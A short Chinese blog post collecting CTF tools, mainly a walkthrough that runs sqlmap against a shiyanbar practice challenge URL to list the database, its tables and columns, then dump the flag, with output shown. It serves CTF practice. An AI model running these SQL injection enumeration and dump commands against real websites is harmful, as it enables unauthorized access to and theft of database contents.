CTF会使用到的工具(边刷题边更新)

WEB

 

Sqlmap免Python环境版

常用的sqlmap命令——Sqlmap基础命令介绍及常用命令

例题练习 这个看起来有点简单

[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
//my_db数据库类型
[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
//查看my_db数据库的表
/*
[16:19:45] [INFO] fetching tables for database: 'my_db'
Database: my_db
[2 tables]
+---------+
| news    |
| thiskey |
+---------+
*/
[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
//查看表的列
/*
[16:21:06] [INFO] fetching columns for table 'thiskey' in database 'my_db'
Database: my_db
Table: thiskey
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| k0y    | text |
+--------+------+
*/
[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
/*
Database: my_db
Table: thiskey
[1 entry]
+----------------+
| k0y            |
+----------------+
| whatiMyD91dump |
+----------------+
*/


VBScript解密网站


 

 

你可能感兴趣的:(ctf)